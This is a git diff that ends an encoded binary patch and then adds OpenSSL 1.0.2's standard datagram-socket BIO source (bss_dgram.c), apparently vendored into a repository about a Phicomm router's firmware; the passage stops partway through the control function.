ztCOjMvSJlfEEbh)pHmqssa0d>Y*;U`yP^l3iq_|pGAoUCQ&2dPhRX>TTnwG;rs@+`
z$oX@M(N%^E9`HYJ!-B#`aD@h{mEm+PD;&x>4py^rxJZTH8|CPLWAGwohSRRH;yVEH
zHajXl3rWX)ImgjHmt$_w-H{Kvt%eubzS<5wxY+SqR?Sd9J`L)O;6Ug>4|9<f2J}<f
zrBY@K%dl>Zpz*A8LPdc-g|k5?c4-cjfkSK%PoUyNz2jeptSKA?ANZ(;Jb7C+6c(;P
z^IBhxq;AMQ>|wsJ>M)Y^MnpS5YvNzGUidYb&D*M=E|^t@!)|-v82Wa62Aabz=NsL2
zytC$DYS|&?dJhl={=07XfZc+<R4R=)Af@Q<F`LYjwEMVIw3-jOAt^z;vF#!x^*qxY
z%Bc%RW<y?7&D*9!4)h^*QsG^=5HFE^p269PwjLZWmB2A(&WM5<7hZ?_=MBeUy%+((
zrvCF;kbqjISx{V>x8dwtJM>q_;F5ooN{#xt><Z{^pmfHF$Iw+ki`NByfrA8U>b%J+
zxTh#t*b>^66~+d^*QTPKs%g~EZrK*t8rT+iFc3M3s)4p<{lh>j+g<e6Hz?WNKJBh)
zndPj5O6>Kp{%#%`V)KPD5d=j)2@Wwd^oM>=Q66i$QYtYY`(G^9=<gUsId#s+OsFnK
zY;)NK)_k*mNzq12ivF=b_x|Cqo>xA8O&Q)$Dr|>Y0^8k{Y`;e<mDEMBkNLE^X_=WL
z7;9!b+h+_<KIj4E(iYyIKx?!92K47u*eQMCY|=Mrr}W@{>*%i?`sk5p={K<T?%u2n
zUxOV~V)o}1%kN;%)W$m;gBag_r#9a17(5K6+IU>8D|)r@F2~?cp-3C=Q-j6%fqaPV
z_=>*IT|IUWxS?brm2YyPNth@F8T<`s4@=V=gP%e@i09b+%cW8{cDC>V<dvaO$KZLE
zIGvf+oDEeMXDZrdOJ*jdor)fkinWlpW@a>Nzp4%EONw(KYs*XzIF5!~x<%`+flUS%
zwB#6k0_+sNE36)bM82s8uF%Tq%!20Z!|*5&TeTRFW<6A0h+!RU6_v<-PL!O5MnlP(
zfk#ujyT);3#(Ew)$B~e&(Q#z0HLU+-1eY;nLYDRZ92+NWck=@iErXK5q2+7{mU*bQ
za1Nb>emRETgj9A0Yk^z$=g=%}r@|cZkQj4<u@122Dm)Il0llrJkcC7uJUlT<jzJA_
z5O1|A+vL$L;n+@3F%8$+Vo#$E*JyKgEm$5^=N-qGjkKdW-=m-iVmGQf{HG`LSX&L~
z_(w-NK%4v5RyQJ(y2WZ3$~qiMW6|R3^h~ijePR79Tby)Z!W1&CO?CFzA3x?R?UA*(
z11PNBe}Az~TAaA?i(Z-*=Z51R2*inc)F4l2I8LZ5@@(3}GgZmg*MWir_iBE}8G!j3
zym#d5T`)K2*1I>ee&M2qS&2pYCbn?-Vlg@~l!LQ_Z;RtQImeM4tAG<{3C2Ll_S5-m
zo~YXjXw!&YD~4?o*1T2guZ8|yF+#82sKACW_7v<?qR&b`=wr?VUB->M#&;>h0b_X?
zmSMa6R2jY#RRgUXi~-kAVMrGFPlxpapB={Y3J+ehV1|kZ1`P0K+<i}WCe!Mj(kdyD
zR9#((F10J#-StqsUAm#&EB+uY?MSC1v1B6QjY;WbY*$=$VJ;q1vHAal%x3$_|FEH^
zU~rYo)3zg%P&2OEy(_%FrT*J8EbD({xzFpnWr=}}Ht}SFlL_5uTGuAQR+>YGhd-37
zjhke7XrpA=<Fs5mdwTU_FlDh$Eid~LzbkNO0}b~MG}0hDzh!NZYYy6)W!JF1LG~P|
z3dz3x(;DSEZF-Zu-gdiPu4|Ni0ol_ayFe3aG{`u~Z-L)F_@VUUWwq=awua=I1Ga$d
z+HY@^Jz7;z_E~qxo<`Xf5LMBypQAp=LgOakbbFbnnSTM<saX@Oov#8v&&x)k^F}-1
z$pIUf-ET)HBNqAo2j%Ty`ThXpuD8gpM$sJe(+%-J!Of5O$?BK=j7|0v<GPjCYr}dW
z*=cQ&tI=1Lb3f;rHO_p+GK@XS3cRe5o%^k^m$1+S*`M*Ubyx=RI$#Aq_hY;?d%s)*
zy*6TtF?y5h;!zL94ZjPV-GhL|JIv#qF83FUrV^}bm;P3os?0X!8yn6sG0P^`vVkSD
zpr2M^N6b0Yv$5GbxyAynFZ9@a<SI4^&wrEUCdi`we%>^jbHMQ30{J-S3wgD>IbXon
zubB56IB(&c%_(48IIqFU4Z`LM+~e>=`xiN9V-5@tuE<;Q;Q_+N6z+TAXOXxvq}Rhw
zh>dW;@NSc4(QG+wlf>wk5lh%4_F^>&>MX}QMM@5GZjR`;IiK*<sPqKqIG3p$Vwoy7
z4=I0=^BXDTX`6({-pTSbWO06*<(B}a;-eM#8x{Du3jD(gyb2b^RPD~I!0{|OmHwIv
z_UBj7Usi$NU4gHuz-PjqIF&z}E9m!D;Ez<`!xi|l3jO^-1^uTh@MkM<JbzBruagz{
z_6q)-0sVQfBEQEcI@`-Z_fHk<;0p=rFXZc*?c<<thd3jDl5?>#=W%|RbGA2w{-O%w
za#ICP4?1|liNvDa-8-VOU6GiY>XsNvt5G#>BzLE}M6x%drVSYDPNw4#<Cw%rxo#>R
zZ8umVzS~H2q~dX@C$4rT+l@08oT_>yZx{}PaPi}1IbK%a<rciGlp;;xmWDt$(z1H>
zrci67HP8?aMWo=y2iCW?M3}*bw$+ienrhGVN}-J#Bj8;mo=PQCEEjEWH*%5os2Y_T
znp+|}<7x!Yf|0J?a=tg2Ql(BcnMkv1w-muziDaZZ8H=i2$pq6hIvPpr=t@fIxQf|i
zugZ#I-SKED($O8=nJ%kF(w)gncY7oiS5tcp3Qe1I3|Ax20~Y$uU6GDxSGSbz%&6_j
z-3f_>*r=T7O?4&I4x>GcGxlcks38fqtXmffwni}QJWf3@w8<FL7o|q%K)pN?tQab>
z(=VQP(HI)RJ5z^QCP^-K#b=Sko-XiZgvqO%<74qU_z8Z7@cD#)LO4E~h5js94=8B=
z8u$tB<Q(n02wzJ0Lc;GQd=cUOgkMiM?mH-G-wi*}E`E4GL4E`L1V2jnV!~e~oc8N&
z&aq!#Ao{p3pqTsn9<k$sa?x%zDuSRt)V`N+d^QUGdkClcTRF!Y^(RI+jeifZ<0AGC
z5$+-UFyS;lrwFJ1oZ%dA)StHqr~dqz*rEPd`4JN1vxN9_72$Zc6Y;s3@UIYlC*d~}
z-by&_*VhQA{p#b~+^<Ior~NuW?6^p~PZ7S9@D~WD{e7Kq>d$%3&HfY#r~Z6M>`;GX
z3^0g!9(ED#g>n(+?-Ner_8j5(j2HSR38(#fn{YZ_?-5SNYZX7DVzH0dZy+4c*rHvX
zbBqr@!o@r7nrV;$LH<Sf3H?2sqkX#X4G>QEy+edk{T~rd^-pn*?cy0(w0n-|FDLwc
z!m0hsgj4&ArbA^Aw2$vb!oHt#>=(6vH{sNN6XDeUj|s=Kjj%sbfxlLPpCcT<1qeIS
z`8f;yr1Pzr@Wn)b8{sPn?<Jhhw?4w@d^<omoo~-_j`935vHv{Lzm0Ht24q0c|6AcF
z`c+3bjq~aXe1PyeV&@so(Vw}5v;RIp-ppSlcJ3hhZxK$%@dDxa?L_$BLOAswRG479
z_=_1?)_+V2j-NqMc-YE3%(*xZ3;n&Ei!;37Gx+|6-&arsZ^3|ri1$vxk8*vn?ghUC
z6Cf^jov`yF-!I%Iex7rWiH~uPa|T7&zrZ=}Q7D36<Q(Tbir|0e9LE|(@JpQISfB|0
zL%x3M8J*zIaNcO*cD`RICN92LgiZVfZfCuTJGq@!6Th1C`%T=%2V9Ih4lAnS9)u#s
z7diG#e4i2HD7f&`1v)5#i|;lf&Vq~YGa{aXi|;V?%*uov@f}9QN9c1k$;A^Q{(_sw
zQGAaYFzJha9W!y^|0^agzB`SXxagNyPr@G&pY7;4h~VPAb&rXQI6Q9R;=T1b6BqG$
z%f!X|>_rn7@3WFOy|+h=?tr_RGVYxsm5O&qy=r`qDtX!KoEJXUOWsrxGpO$O!b>Dm
zG8oUWV!&Q}o9mXmv1CtAJOM`FUjcD1eB@rr-oAK#XCmY6O(lEdDRnP55buN+plDCr
zh}3^~bwPFPI-mY!WA!}s3EwwG0S}YNO4mXPx32m!F%koKXalL|3kUz(k9Ea566<3z
z=X{%koFTV=_R|?FFt?BU7TWy0_3^BQHpO~|BoonoKmdLh?TdQ|IHqyFQrXA--%25*
z`8Hps^_=0IN)8`VARcZQ<A-Bpj^9RL*uJ^{XL<W#{{s~!E`ArcwUC%<{KoK*4w7S6
z`0pLuv2AnvJAh&PV*i396W=W3j%O4qB5vZo3kpS=>TTimDZ{i`w+|R@_2&3*=k;As
zMn(897=8yvo96lhyuQ;^V6Knfm#2!~Ph3y{QpX*}_~BP;QD4mesoKVRkD)TiG5-9-
s=M0_!%=K}3n#UfHq+Eqp_&<!ve{=ls3^rB$vkO^u>5y?NU(NOZ2~6(kJOBUy

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/bss_dgram.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/bss_dgram.c
new file mode 100644
index 0000000..fcbae5f
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/bss_dgram.c
@@ -0,0 +1,2069 @@
+/* crypto/bio/bio_dgram.c */
+/*
+ * DTLS implementation written by Nagendra Modadugu
+ * (nagendra@cs.stanford.edu) for the OpenSSL project 2005.
+ */
+/* ====================================================================
+ * Copyright (c) 1999-2005 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include <errno.h>
+#define USE_SOCKETS
+#include "cryptlib.h"
+
+#include <openssl/bio.h>
+#ifndef OPENSSL_NO_DGRAM
+
+# if defined(OPENSSL_SYS_VMS)
+#  include <sys/timeb.h>
+# endif
+
+# ifndef OPENSSL_NO_SCTP
+#  include <netinet/sctp.h>
+#  include <fcntl.h>
+#  define OPENSSL_SCTP_DATA_CHUNK_TYPE            0x00
+#  define OPENSSL_SCTP_FORWARD_CUM_TSN_CHUNK_TYPE 0xc0
+# endif
+
+# if defined(OPENSSL_SYS_LINUX) && !defined(IP_MTU)
+#  define IP_MTU      14        /* linux is lame */
+# endif
+
+# if OPENSSL_USE_IPV6 && !defined(IPPROTO_IPV6)
+#  define IPPROTO_IPV6 41       /* windows is lame */
+# endif
+
+# if defined(__FreeBSD__) && defined(IN6_IS_ADDR_V4MAPPED)
+/* Standard definition causes type-punning problems. */
+#  undef IN6_IS_ADDR_V4MAPPED
+#  define s6_addr32 __u6_addr.__u6_addr32
+#  define IN6_IS_ADDR_V4MAPPED(a)               \
+        (((a)->s6_addr32[0] == 0) &&          \
+         ((a)->s6_addr32[1] == 0) &&          \
+         ((a)->s6_addr32[2] == htonl(0x0000ffff)))
+# endif
+
+# ifdef WATT32
+#  define sock_write SockWrite  /* Watt-32 uses same names */
+#  define sock_read  SockRead
+#  define sock_puts  SockPuts
+# endif
+
+static int dgram_write(BIO *h, const char *buf, int num);
+static int dgram_read(BIO *h, char *buf, int size);
+static int dgram_puts(BIO *h, const char *str);
+static long dgram_ctrl(BIO *h, int cmd, long arg1, void *arg2);
+static int dgram_new(BIO *h);
+static int dgram_free(BIO *data);
+static int dgram_clear(BIO *bio);
+
+# ifndef OPENSSL_NO_SCTP
+static int dgram_sctp_write(BIO *h, const char *buf, int num);
+static int dgram_sctp_read(BIO *h, char *buf, int size);
+static int dgram_sctp_puts(BIO *h, const char *str);
+static long dgram_sctp_ctrl(BIO *h, int cmd, long arg1, void *arg2);
+static int dgram_sctp_new(BIO *h);
+static int dgram_sctp_free(BIO *data);
+#  ifdef SCTP_AUTHENTICATION_EVENT
+static void dgram_sctp_handle_auth_free_key_event(BIO *b, union sctp_notification
+                                                  *snp);
+#  endif
+# endif
+
+static int BIO_dgram_should_retry(int s);
+
+static void get_current_time(struct timeval *t);
+
+static BIO_METHOD methods_dgramp = {
+    BIO_TYPE_DGRAM,
+    "datagram socket",
+    dgram_write,
+    dgram_read,
+    dgram_puts,
+    NULL,                       /* dgram_gets, */
+    dgram_ctrl,
+    dgram_new,
+    dgram_free,
+    NULL,
+};
+
+# ifndef OPENSSL_NO_SCTP
+static BIO_METHOD methods_dgramp_sctp = {
+    BIO_TYPE_DGRAM_SCTP,
+    "datagram sctp socket",
+    dgram_sctp_write,
+    dgram_sctp_read,
+    dgram_sctp_puts,
+    NULL,                       /* dgram_gets, */
+    dgram_sctp_ctrl,
+    dgram_sctp_new,
+    dgram_sctp_free,
+    NULL,
+};
+# endif
+
+typedef struct bio_dgram_data_st {
+    union {
+        struct sockaddr sa;
+        struct sockaddr_in sa_in;
+# if OPENSSL_USE_IPV6
+        struct sockaddr_in6 sa_in6;
+# endif
+    } peer;
+    unsigned int connected;
+    unsigned int _errno;
+    unsigned int mtu;
+    struct timeval next_timeout;
+    struct timeval socket_timeout;
+} bio_dgram_data;
+
+# ifndef OPENSSL_NO_SCTP
+typedef struct bio_dgram_sctp_save_message_st {
+    BIO *bio;
+    char *data;
+    int length;
+} bio_dgram_sctp_save_message;
+
+typedef struct bio_dgram_sctp_data_st {
+    union {
+        struct sockaddr sa;
+        struct sockaddr_in sa_in;
+#  if OPENSSL_USE_IPV6
+        struct sockaddr_in6 sa_in6;
+#  endif
+    } peer;
+    unsigned int connected;
+    unsigned int _errno;
+    unsigned int mtu;
+    struct bio_dgram_sctp_sndinfo sndinfo;
+    struct bio_dgram_sctp_rcvinfo rcvinfo;
+    struct bio_dgram_sctp_prinfo prinfo;
+    void (*handle_notifications) (BIO *bio, void *context, void *buf);
+    void *notification_context;
+    int in_handshake;
+    int ccs_rcvd;
+    int ccs_sent;
+    int save_shutdown;
+    int peer_auth_tested;
+    bio_dgram_sctp_save_message saved_message;
+} bio_dgram_sctp_data;
+# endif
+
+BIO_METHOD *BIO_s_datagram(void)
+{
+    return (&methods_dgramp);
+}
+
+BIO *BIO_new_dgram(int fd, int close_flag)
+{
+    BIO *ret;
+
+    ret = BIO_new(BIO_s_datagram());
+    if (ret == NULL)
+        return (NULL);
+    BIO_set_fd(ret, fd, close_flag);
+    return (ret);
+}
+
+static int dgram_new(BIO *bi)
+{
+    bio_dgram_data *data = NULL;
+
+    bi->init = 0;
+    bi->num = 0;
+    data = OPENSSL_malloc(sizeof(bio_dgram_data));
+    if (data == NULL)
+        return 0;
+    memset(data, 0x00, sizeof(bio_dgram_data));
+    bi->ptr = data;
+
+    bi->flags = 0;
+    return (1);
+}
+
+static int dgram_free(BIO *a)
+{
+    bio_dgram_data *data;
+
+    if (a == NULL)
+        return (0);
+    if (!dgram_clear(a))
+        return 0;
+
+    data = (bio_dgram_data *)a->ptr;
+    if (data != NULL)
+        OPENSSL_free(data);
+
+    return (1);
+}
+
+static int dgram_clear(BIO *a)
+{
+    if (a == NULL)
+        return (0);
+    if (a->shutdown) {
+        if (a->init) {
+            SHUTDOWN2(a->num);
+        }
+        a->init = 0;
+        a->flags = 0;
+    }
+    return (1);
+}
+
+static void dgram_adjust_rcv_timeout(BIO *b)
+{
+# if defined(SO_RCVTIMEO)
+    bio_dgram_data *data = (bio_dgram_data *)b->ptr;
+    union {
+        size_t s;
+        int i;
+    } sz = {
+        0
+    };
+
+    /* Is a timer active? */
+    if (data->next_timeout.tv_sec > 0 || data->next_timeout.tv_usec > 0) {
+        struct timeval timenow, timeleft;
+
+        /* Read current socket timeout */
+#  ifdef OPENSSL_SYS_WINDOWS
+        int timeout;
+
+        sz.i = sizeof(timeout);
+        if (getsockopt(b->num, SOL_SOCKET, SO_RCVTIMEO,
+                       (void *)&timeout, &sz.i) < 0) {
+            perror("getsockopt");
+        } else {
+            data->socket_timeout.tv_sec = timeout / 1000;
+            data->socket_timeout.tv_usec = (timeout % 1000) * 1000;
+        }
+#  else
+        sz.i = sizeof(data->socket_timeout);
+        if (getsockopt(b->num, SOL_SOCKET, SO_RCVTIMEO,
+                       &(data->socket_timeout), (void *)&sz) < 0) {
+            perror("getsockopt");
+        } else if (sizeof(sz.s) != sizeof(sz.i) && sz.i == 0)
+            OPENSSL_assert(sz.s <= sizeof(data->socket_timeout));
+#  endif
+
+        /* Get current time */
+        get_current_time(&timenow);
+
+        /* Calculate time left until timer expires */
+        memcpy(&timeleft, &(data->next_timeout), sizeof(struct timeval));
+        timeleft.tv_sec -= timenow.tv_sec;
+        timeleft.tv_usec -= timenow.tv_usec;
+        if (timeleft.tv_usec < 0) {
+            timeleft.tv_sec--;
+            timeleft.tv_usec += 1000000;
+        }
+
+        if (timeleft.tv_sec < 0) {
+            timeleft.tv_sec = 0;
+            timeleft.tv_usec = 1;
+        }
+
+        /*
+         * Adjust socket timeout if next handhake message timer will expire
+         * earlier.
+         */
+        if ((data->socket_timeout.tv_sec == 0
+             && data->socket_timeout.tv_usec == 0)
+            || (data->socket_timeout.tv_sec > timeleft.tv_sec)
+            || (data->socket_timeout.tv_sec == timeleft.tv_sec
+                && data->socket_timeout.tv_usec >= timeleft.tv_usec)) {
+#  ifdef OPENSSL_SYS_WINDOWS
+            timeout = timeleft.tv_sec * 1000 + timeleft.tv_usec / 1000;
+            if (setsockopt(b->num, SOL_SOCKET, SO_RCVTIMEO,
+                           (void *)&timeout, sizeof(timeout)) < 0) {
+                perror("setsockopt");
+            }
+#  else
+            if (setsockopt(b->num, SOL_SOCKET, SO_RCVTIMEO, &timeleft,
+                           sizeof(struct timeval)) < 0) {
+                perror("setsockopt");
+            }
+#  endif
+        }
+    }
+# endif
+}
+
+static void dgram_reset_rcv_timeout(BIO *b)
+{
+# if defined(SO_RCVTIMEO)
+    bio_dgram_data *data = (bio_dgram_data *)b->ptr;
+
+    /* Is a timer active? */
+    if (data->next_timeout.tv_sec > 0 || data->next_timeout.tv_usec > 0) {
+#  ifdef OPENSSL_SYS_WINDOWS
+        int timeout = data->socket_timeout.tv_sec * 1000 +
+            data->socket_timeout.tv_usec / 1000;
+        if (setsockopt(b->num, SOL_SOCKET, SO_RCVTIMEO,
+                       (void *)&timeout, sizeof(timeout)) < 0) {
+            perror("setsockopt");
+        }
+#  else
+        if (setsockopt
+            (b->num, SOL_SOCKET, SO_RCVTIMEO, &(data->socket_timeout),
+             sizeof(struct timeval)) < 0) {
+            perror("setsockopt");
+        }
+#  endif
+    }
+# endif
+}
+
+static int dgram_read(BIO *b, char *out, int outl)
+{
+    int ret = 0;
+    bio_dgram_data *data = (bio_dgram_data *)b->ptr;
+
+    struct {
+        /*
+         * See commentary in b_sock.c. <appro>
+         */
+        union {
+            size_t s;
+            int i;
+        } len;
+        union {
+            struct sockaddr sa;
+            struct sockaddr_in sa_in;
+# if OPENSSL_USE_IPV6
+            struct sockaddr_in6 sa_in6;
+# endif
+        } peer;
+    } sa;
+
+    sa.len.s = 0;
+    sa.len.i = sizeof(sa.peer);
+
+    if (out != NULL) {
+        clear_socket_error();
+        memset(&sa.peer, 0x00, sizeof(sa.peer));
+        dgram_adjust_rcv_timeout(b);
+        ret = recvfrom(b->num, out, outl, 0, &sa.peer.sa, (void *)&sa.len);
+        if (sizeof(sa.len.i) != sizeof(sa.len.s) && sa.len.i == 0) {
+            OPENSSL_assert(sa.len.s <= sizeof(sa.peer));
+            sa.len.i = (int)sa.len.s;
+        }
+
+        if (!data->connected && ret >= 0)
+            BIO_ctrl(b, BIO_CTRL_DGRAM_SET_PEER, 0, &sa.peer);
+
+        BIO_clear_retry_flags(b);
+        if (ret < 0) {
+            if (BIO_dgram_should_retry(ret)) {
+                BIO_set_retry_read(b);
+                data->_errno = get_last_socket_error();
+            }
+        }
+
+        dgram_reset_rcv_timeout(b);
+    }
+    return (ret);
+}
+
+static int dgram_write(BIO *b, const char *in, int inl)
+{
+    int ret;
+    bio_dgram_data *data = (bio_dgram_data *)b->ptr;
+    clear_socket_error();
+
+    if (data->connected)
+        ret = writesocket(b->num, in, inl);
+    else {
+        int peerlen = sizeof(data->peer);
+
+        if (data->peer.sa.sa_family == AF_INET)
+            peerlen = sizeof(data->peer.sa_in);
+# if OPENSSL_USE_IPV6
+        else if (data->peer.sa.sa_family == AF_INET6)
+            peerlen = sizeof(data->peer.sa_in6);
+# endif
+# if defined(NETWARE_CLIB) && defined(NETWARE_BSDSOCK)
+        ret = sendto(b->num, (char *)in, inl, 0, &data->peer.sa, peerlen);
+# else
+        ret = sendto(b->num, in, inl, 0, &data->peer.sa, peerlen);
+# endif
+    }
+
+    BIO_clear_retry_flags(b);
+    if (ret <= 0) {
+        if (BIO_dgram_should_retry(ret)) {
+            BIO_set_retry_write(b);
+            data->_errno = get_last_socket_error();
+
+# if 0                          /* higher layers are responsible for querying
+                                 * MTU, if necessary */
+            if (data->_errno == EMSGSIZE)
+                /* retrieve the new MTU */
+                BIO_ctrl(b, BIO_CTRL_DGRAM_QUERY_MTU, 0, NULL);
+# endif
+        }
+    }
+    return (ret);
+}
+
+static long dgram_get_mtu_overhead(bio_dgram_data *data)
+{
+    long ret;
+
+    switch (data->peer.sa.sa_family) {
+    case AF_INET:
+        /*
+         * Assume this is UDP - 20 bytes for IP, 8 bytes for UDP
+         */
+        ret = 28;
+        break;
+# if OPENSSL_USE_IPV6
+    case AF_INET6:
+#  ifdef IN6_IS_ADDR_V4MAPPED
+        if (IN6_IS_ADDR_V4MAPPED(&data->peer.sa_in6.sin6_addr))
+            /*
+             * Assume this is UDP - 20 bytes for IP, 8 bytes for UDP
+             */
+            ret = 28;
+        else
+#  endif
+            /*
+             * Assume this is UDP - 40 bytes for IP, 8 bytes for UDP
+             */
+            ret = 48;
+        break;
+# endif
+    default:
+        /* We don't know. Go with the historical default */
+        ret = 28;
+        break;
+    }
+    return ret;
+}
+
+static long dgram_ctrl(BIO *b, int cmd, long num, void *ptr)
+{
+    long ret = 1;
+    int *ip;
+    struct sockaddr *to = NULL;
+    bio_dgram_data *data = NULL;
+    int sockopt_val = 0;
+# if defined(OPENSSL_SYS_LINUX) && (defined(IP_MTU_DISCOVER) || defined(IP_MTU))
+    socklen_t sockopt_len;      /* assume that system supporting IP_MTU is
+                                 * modern enough to define socklen_t */
+    socklen_t addr_len;
+    union {
+        struct sockaddr sa;
+        struct sockaddr_in s4;
+#  if OPENSSL_USE_IPV6
+        struct sockaddr_in6 s6;
+#  endif
+    } addr;
+# endif
+
+    data = (bio_dgram_data *)b->ptr;
+
+    switch (cmd) {
+    case BIO_CTRL_RESET:
+        num = 0;
+    case BIO_C_FILE_SEEK:
+        ret = 0;
+        break;
+    case BIO_C_FILE_TELL:
+    case BIO_CTRL_INFO:
+        ret = 0;
+        break;
+    case BIO_C_SET_FD:
+        dgram_clear(b);
+        b->num = *((int *)ptr);
+        b->shutdown = (int)num;
+        b->init = 1;
+        break;
+    case BIO_C_GET_FD:
+        if (b->init) {
+            ip = (int *)ptr;
+            if (ip != NULL)
+                *ip = b->num;
+            ret = b->num;
+        } else
+            ret = -1;
+        break;
+    case BIO_CTRL_GET_CLOSE:
+        ret = b->shutdown;
+        break;
+    case BIO_CTRL_SET_CLOSE:
+        b->shutdown = (int)num;
+        break;
+    case BIO_CTRL_PENDING:
+    case BIO_CTRL_WPENDING:
+        ret = 0;
+        break;
+    case BIO_CTRL_DUP:
+    case BIO_CTRL_FLUSH:
+        ret = 1;
+        break;
+    case BIO_CTRL_DGRAM_CONNECT:
+        to = (struct sockaddr *)ptr;
+# if 0
+        if (connect(b->num, to, sizeof(struct sockaddr)) < 0) {
+            perror("connect");
+            ret = 0;
+        } else {
+# endif
+            switch (to->sa_family) {
+            case AF_INET:
+                memcpy(&data->peer, to, sizeof(data->peer.sa_in));
+                break;
+# if OPENSSL_USE_IPV6
+            case AF_INET6:
+                memcpy(&data->peer, to, sizeof(data->peer.sa_in6));
+                break;
+# endif
+            default:
+                memcpy(&data->peer, to, sizeof(data->peer.sa));
+                break;
+            }
+# if 0
+        }
+# endif
+        break;
+        /* (Linux)kernel sets DF bit on outgoing IP packets */
+    case BIO_CTRL_DGRAM_MTU_DISCOVER:
+# if defined(OPENSSL_SYS_LINUX) && defined(IP_MTU_DISCOVER) && defined(IP_PMTUDISC_DO)
+        addr_len = (socklen_t) sizeof(addr);
+        memset((void *)&addr, 0, sizeof(addr));
+        if (getsockname(b->num, &addr.sa, &addr_len) < 0) {
+            ret = 0;
+            break;
+        }
+        switch (addr.sa.sa_family) {
+        case AF_INET:
+            sockopt_val = IP_PMTUDISC_DO;
+            if ((ret = setsockopt(b->num, IPPROTO_IP, IP_MTU_DISCOVER,
+                                  &sockopt_val, sizeof(sockopt_val))) < 0)
+                perror("setsockopt");
+            break;
+#  if OPENSSL_USE_IPV6 && defined(IPV6_MTU_DISCOVER) && defined(IPV6_PMTUDISC_DO)
+        case AF_INET6:
+            sockopt_val = IPV6_PMTUDISC_DO;
+            if ((ret = setsockopt(b->num, IPPROTO_IPV6, IPV6_MTU_DISCOVER,
+                                  &sockopt_val, sizeof(sockopt_val))) < 0)
+                perror("setsockopt");
+            break;
+#  endif
+        default:
+            ret = -1;
+            break;
+        }
+        ret = -1;
+# else
+        break;
+# endif
+    case BIO_CTRL_DGRAM_QUERY_MTU:
+# if defined(OPENSSL_SYS_LINUX) && defined(IP_MTU)
+        addr_len = (socklen_t) sizeof(addr);
+        memset((void *)&addr, 0, sizeof(addr));
+        if (getsockname(b->num, &addr.sa, &addr_len) < 0) {
+            ret = 0;
+            break;
+        }
+        sockopt_len = sizeof(sockopt_val);
+        switch (addr.sa.sa_family) {
+        case AF_INET:
+            if ((ret =
+                 getsockopt(b->num, IPPROTO_IP, IP_MTU, (void *)&sockopt_val,
+                            &sockopt_len)) < 0 || sockopt_val < 0) {
+                ret = 0;
+            } else {
+                /*
+                 * we assume that the transport protocol is UDP and no IP
+                 * options are used.
+                 */
+                data->mtu = sockopt_val - 8 - 20;
+                ret = data->mtu;
+            }
+            break;
+#  if OPENSSL_USE_IPV6 && defined(IPV6_MTU)
+        case AF_INET6:
+            if ((ret =
+                 getsockopt(b->num, IPPROTO_IPV6, IPV6_MTU,
+                            (void *)&sockopt_val, &sockopt_len)) < 0
+                || sockopt_val < 0) {
+                ret = 0;
+            } else {
+                /*
+                 * we assume that the transport protocol is UDP and no IPV6
+                 * options are used.
+                 */
+                data->mtu = sockopt_val - 8 - 40;
+                ret = data->mtu;
+            }
+            break;
+#  endif
+        default:
+            ret = 0;
+            break;
+        }
+# else
+        ret = 0;
+# endif
+        break;
+    case BIO_CTRL_DGRAM_GET_FALLBACK_MTU:
+        ret = -dgram_get_mtu_overhead(data);
+        switch (data->peer.sa.sa_family) {
+        case AF_INET:
+            ret += 576;
+            break;
+# if OPENSSL_USE_IPV6
+        case AF_INET6:
+#  ifdef IN6_IS_ADDR_V4MAPPED
+            if (IN6_IS_ADDR_V4MAPPED(&data->peer.sa_in6.sin6_addr))
+                ret += 576;
+            else
+#  endif
+                ret += 1280;
+            break;
+# endif
+        default:
+            ret += 576;
+            break;
+        }
+        break;
+    case BIO_CTRL_DGRAM_GET_MTU:
+        return data->mtu;
+        break;
+    case BIO_CTRL_DGRAM_SET_MTU:
+        data->mtu = num;
+        ret = num;
+        break;
+    case BIO_CTRL_DGRAM_SET_CONNECTED:
+        to = (struct sockaddr *)ptr;
+
+        if (to != NULL) {
+            data->connected = 1;
+            switch (to->sa_family) {
+            case AF_INET:
+                memcpy(&data->peer, to, sizeof(data->peer.sa_in));
